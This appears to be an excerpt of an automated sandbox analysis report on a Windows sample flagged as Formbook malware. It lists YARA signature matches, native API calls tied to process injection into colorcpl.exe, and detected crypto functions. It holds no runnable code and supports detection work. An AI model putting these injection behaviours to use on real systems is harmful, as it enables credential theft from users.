Source: 2.0.UOMp9cDcqZ.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.UOMp9cDcqZ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.UOMp9cDcqZ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.UOMp9cDcqZ.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.UOMp9cDcqZ.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Contains functionality to call native functions

Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_004181B0 NtCreateFile,		2_2_004181B0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_00418260 NtReadFile,		2_2_00418260
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_004182E0 NtClose,		2_2_004182E0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_00418390 NtAllocateVirtualMemory,		2_2_00418390
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_004182AC NtReadFile,		2_2_004182AC
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0041838B NtAllocateVirtualMemory,		2_2_0041838B
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,		2_2_013E9910
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013E9540 NtReadFile,LdrInitializeThunk,		2_2_013E9540
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013E99A0 NtCreateSection,LdrInitializeThunk,		2_2_013E99A0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013E95D0 NtClose,LdrInitializeThunk,		2_2_013E95D0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013E9860 NtQuerySystemInformation,LdrInitializeThunk,		2_2_013E9860
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013E9840 NtDelayExecution,LdrInitializeThunk,		2_2_013E9840
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013E98F0 NtReadVirtualMemory,LdrInitializeThunk,		2_2_013E98F0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013E9710 NtQueryInformationToken,LdrInitializeThunk,		2_2_013E9710
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013E97A0 NtUnmapViewOfSection,LdrInitializeThunk,		2_2_013E97A0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013E9780 NtMapViewOfSection,LdrInitializeThunk,		2_2_013E9780
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013E9FE0 NtCreateMutant,LdrInitializeThunk,		2_2_013E9FE0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013E9A20 NtResumeThread,LdrInitializeThunk,		2_2_013E9A20
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013E9A00 NtProtectVirtualMemory,LdrInitializeThunk,		2_2_013E9A00
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013E9660 NtAllocateVirtualMemory,LdrInitializeThunk,		2_2_013E9660
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013E9A50 NtCreateFile,LdrInitializeThunk,		2_2_013E9A50
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013E96E0 NtFreeVirtualMemory,LdrInitializeThunk,		2_2_013E96E0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013EAD30 NtSetContextThread,		2_2_013EAD30
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013E9520 NtWaitForSingleObject,		2_2_013E9520
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013E9560 NtWriteFile,		2_2_013E9560
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013E9950 NtQueueApcThread,		2_2_013E9950
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013E95F0 NtQueryInformationFile,		2_2_013E95F0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013E99D0 NtCreateProcessEx,		2_2_013E99D0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013E9820 NtEnumerateKey,		2_2_013E9820
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013EB040 NtSuspendThread,		2_2_013EB040
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013E98A0 NtWriteVirtualMemory,		2_2_013E98A0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013E9730 NtQueryVirtualMemory,		2_2_013E9730
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013EA710 NtOpenProcessToken,		2_2_013EA710
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013E9B00 NtSetValueKey,		2_2_013E9B00
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013E9770 NtSetInformationFile,		2_2_013E9770
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013EA770 NtOpenThread,		2_2_013EA770
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013E9760 NtOpenProcess,		2_2_013E9760
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013EA3B0 NtGetContextThread,		2_2_013EA3B0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013E9610 NtEnumerateValueKey,		2_2_013E9610
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013E9A10 NtQuerySection,		2_2_013E9A10
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013E9670 NtQueryInformationProcess,		2_2_013E9670
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013E9650 NtQueryValueKey,		2_2_013E9650
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013E9A80 NtOpenDirectoryObject,		2_2_013E9A80
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013E96D0 NtCreateKey,		2_2_013E96D0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04739540 NtReadFile,LdrInitializeThunk,		15_2_04739540
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047395D0 NtClose,LdrInitializeThunk,		15_2_047395D0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04739660 NtAllocateVirtualMemory,LdrInitializeThunk,		15_2_04739660
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04739650 NtQueryValueKey,LdrInitializeThunk,		15_2_04739650
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047396E0 NtFreeVirtualMemory,LdrInitializeThunk,		15_2_047396E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047396D0 NtCreateKey,LdrInitializeThunk,		15_2_047396D0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04739710 NtQueryInformationToken,LdrInitializeThunk,		15_2_04739710
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04739FE0 NtCreateMutant,LdrInitializeThunk,		15_2_04739FE0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04739780 NtMapViewOfSection,LdrInitializeThunk,		15_2_04739780
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04739860 NtQuerySystemInformation,LdrInitializeThunk,		15_2_04739860
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04739840 NtDelayExecution,LdrInitializeThunk,		15_2_04739840
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04739910 NtAdjustPrivilegesToken,LdrInitializeThunk,		15_2_04739910
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047399A0 NtCreateSection,LdrInitializeThunk,		15_2_047399A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04739A50 NtCreateFile,LdrInitializeThunk,		15_2_04739A50
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04739560 NtWriteFile,		15_2_04739560
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0473AD30 NtSetContextThread,		15_2_0473AD30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04739520 NtWaitForSingleObject,		15_2_04739520
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047395F0 NtQueryInformationFile,		15_2_047395F0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04739670 NtQueryInformationProcess,		15_2_04739670
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04739610 NtEnumerateValueKey,		15_2_04739610
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0473A770 NtOpenThread,		15_2_0473A770
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04739770 NtSetInformationFile,		15_2_04739770
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04739760 NtOpenProcess,		15_2_04739760
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04739730 NtQueryVirtualMemory,		15_2_04739730
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0473A710 NtOpenProcessToken,		15_2_0473A710
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047397A0 NtUnmapViewOfSection,		15_2_047397A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0473B040 NtSuspendThread,		15_2_0473B040
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04739820 NtEnumerateKey,		15_2_04739820
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047398F0 NtReadVirtualMemory,		15_2_047398F0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047398A0 NtWriteVirtualMemory,		15_2_047398A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04739950 NtQueueApcThread,		15_2_04739950
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047399D0 NtCreateProcessEx,		15_2_047399D0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04739A20 NtResumeThread,		15_2_04739A20
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04739A10 NtQuerySection,		15_2_04739A10
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04739A00 NtProtectVirtualMemory,		15_2_04739A00
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04739A80 NtOpenDirectoryObject,		15_2_04739A80
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04739B00 NtSetValueKey,		15_2_04739B00
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0473A3B0 NtGetContextThread,		15_2_0473A3B0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_02558260 NtReadFile,		15_2_02558260
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_025582E0 NtClose,		15_2_025582E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_02558390 NtAllocateVirtualMemory,		15_2_02558390
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_025581B0 NtCreateFile,		15_2_025581B0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_025582AC NtReadFile,		15_2_025582AC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0255838B NtAllocateVirtualMemory,		15_2_0255838B

Detected potential crypto function

Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 1_2_006EA90E		1_2_006EA90E
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 1_2_006E63D1		1_2_006E63D1
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 1_2_02B0C2B0		1_2_02B0C2B0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 1_2_02B09970		1_2_02B09970
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 1_2_08B77A60		1_2_08B77A60
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 1_2_08B7AD18		1_2_08B7AD18
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 1_2_08B7BF50		1_2_08B7BF50
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 1_2_08B7B588		1_2_08B7B588
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 1_2_08B7E850		1_2_08B7E850
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 1_2_08B7BA38		1_2_08B7BA38
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 1_2_08B7BA28		1_2_08B7BA28
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 1_2_08B77A51		1_2_08B77A51
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 1_2_08B7DC68		1_2_08B7DC68
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 1_2_08B7AC5F		1_2_08B7AC5F
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 1_2_08B7EEF0		1_2_08B7EEF0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 1_2_08B7AFB0		1_2_08B7AFB0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 1_2_08B7AFC0		1_2_08B7AFC0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 1_2_08B7BF42		1_2_08B7BF42
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 1_2_08B7A0F9		1_2_08B7A0F9
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 1_2_08B70006		1_2_08B70006
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 1_2_08B70040		1_2_08B70040
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 1_2_08B7A108		1_2_08B7A108
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 1_2_08B7F148		1_2_08B7F148
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 1_2_08B7F3D8		1_2_08B7F3D8
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 1_2_08B774B0		1_2_08B774B0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 1_2_08B774A0		1_2_08B774A0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 1_2_08B7B578		1_2_08B7B578
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 1_2_0E618872		1_2_0E618872
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 1_2_0E61A830		1_2_0E61A830
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 1_2_0E618668		1_2_0E618668
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 1_2_0E613678		1_2_0E613678
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 1_2_0E618678		1_2_0E618678
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 1_2_0E61365D		1_2_0E61365D
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 1_2_0E615AE0		1_2_0E615AE0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 1_2_0E615AD2		1_2_0E615AD2
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 1_2_0E6182A0		1_2_0E6182A0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 1_2_0E618290		1_2_0E618290
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_00401030		2_2_00401030
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0041B8B1		2_2_0041B8B1
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0041B963		2_2_0041B963
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_00408C4B		2_2_00408C4B
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_00408C50		2_2_00408C50
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0041B493		2_2_0041B493
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0041B496		2_2_0041B496
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0041C539		2_2_0041C539
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_00402D89		2_2_00402D89
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_00402D90		2_2_00402D90
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0041CE85		2_2_0041CE85
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0041BF12		2_2_0041BF12
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0041C795		2_2_0041C795
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_00402FB0		2_2_00402FB0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0086A90E		2_2_0086A90E
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_008663D1		2_2_008663D1
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01471D55		2_2_01471D55
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013A0D20		2_2_013A0D20
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013C4120		2_2_013C4120
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013AF900		2_2_013AF900
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01472D07		2_2_01472D07
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_014725DD		2_2_014725DD
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013D2581		2_2_013D2581
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013BD5E0		2_2_013BD5E0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013B841F		2_2_013B841F
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01461002		2_2_01461002
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013D20A0		2_2_013D20A0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013BB090		2_2_013BB090
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_014728EC		2_2_014728EC
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_014720A8		2_2_014720A8
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01472B28		2_2_01472B28
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013DEBB0		2_2_013DEBB0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0146DBD2		2_2_0146DBD2
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01471FF1		2_2_01471FF1
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013C6E30		2_2_013C6E30
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01472EF7		2_2_01472EF7
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_014722AE		2_2_014722AE
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047BD466		15_2_047BD466
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0470841F		15_2_0470841F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047C1D55		15_2_047C1D55
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_046F0D20		15_2_046F0D20
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047C2D07		15_2_047C2D07
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0470D5E0		15_2_0470D5E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047C25DD		15_2_047C25DD
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04722581		15_2_04722581
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04716E30		15_2_04716E30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047BD616		15_2_047BD616
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047C2EF7		15_2_047C2EF7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047C1FF1		15_2_047C1FF1
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047CDFCE		15_2_047CDFCE
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047CE824		15_2_047CE824
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047B1002		15_2_047B1002
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047C28EC		15_2_047C28EC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047220A0		15_2_047220A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047C20A8		15_2_047C20A8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0470B090		15_2_0470B090
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04714120		15_2_04714120
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_046FF900		15_2_046FF900
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047AFA2B		15_2_047AFA2B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047C22AE		15_2_047C22AE
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047C2B28		15_2_047C2B28
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047B03DA		15_2_047B03DA
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047BDBD2		15_2_047BDBD2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0472EBB0		15_2_0472EBB0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0255B8B1		15_2_0255B8B1
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0255B954		15_2_0255B954
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0255CE85		15_2_0255CE85
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0255BF12		15_2_0255BF12
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0255C795		15_2_0255C795
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_02542FB0		15_2_02542FB0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_02548C50		15_2_02548C50
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_02548C4B		15_2_02548C4B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0255B496		15_2_0255B496
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0255B493		15_2_0255B493
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0255C539		15_2_0255C539
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_02542D90		15_2_02542D90
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_02542D89		15_2_02542D89

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 046FB150 appears 45 times
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: String function: 013AB150 appears 35 times

Sample file is different than original file name gathered from version info

Source: UOMp9cDcqZ.exe	Binary or memory string: OriginalFilename vs UOMp9cDcqZ.exe
Source: UOMp9cDcqZ.exe, 00000001.00000002.256636609.0000000008D10000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameDSASignature.dll@ vs UOMp9cDcqZ.exe
Source: UOMp9cDcqZ.exe, 00000001.00000002.256510842.0000000008A20000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemscorrc.dllT vs UOMp9cDcqZ.exe
Source: UOMp9cDcqZ.exe	Binary or memory string: OriginalFilename vs UOMp9cDcqZ.exe
Source: UOMp9cDcqZ.exe, 00000002.00000002.315793832.0000000001353000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamecolorcpl.exej% vs UOMp9cDcqZ.exe
Source: UOMp9cDcqZ.exe, 00000002.00000002.316166419.000000000162F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs UOMp9cDcqZ.exe
Source: UOMp9cDcqZ.exe	Binary or memory string: OriginalFilenameOrderablePartitioner.exeZ vs UOMp9cDcqZ.exe

Uses 32bit PE files

Source: UOMp9cDcqZ.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Yara signature match

Source: 00000002.00000000.245316233.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000000.245316233.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.494486167.0000000004490000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.494486167.0000000004490000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.315392989.0000000000DE0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.315392989.0000000000DE0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.492679624.0000000002540000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.492679624.0000000002540000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.314958304.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.314958304.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
